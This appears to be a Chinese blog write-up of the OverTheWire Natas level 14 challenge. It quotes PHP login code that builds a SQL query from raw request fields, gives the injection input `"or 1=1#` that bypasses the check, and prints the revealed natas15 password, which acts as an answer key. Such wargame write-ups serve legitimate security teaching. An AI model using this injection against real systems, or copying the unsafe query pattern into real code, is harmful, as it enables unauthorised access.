Overthewire level 14 to level 15

这一关需要我们输入用户名和密码来获取15关的密码，网页源代码如下

if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
    }
    mysql_close($link);
}

由于代码中直接将username和password进行拼接，我们可以考虑sql注入的方式绕过登录机制

username = "or 1=1#
password =

一个很简单的sql注入，拼接后的query为

select * from users where username="" or 1=1#

"#" 注释了之后的代码，因此密码就无关紧要了
Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

标签：username,natas14,echo,link,mysql,query,password,Overthewire
来源： https://www.cnblogs.com/wudiiv11/p/natas14.html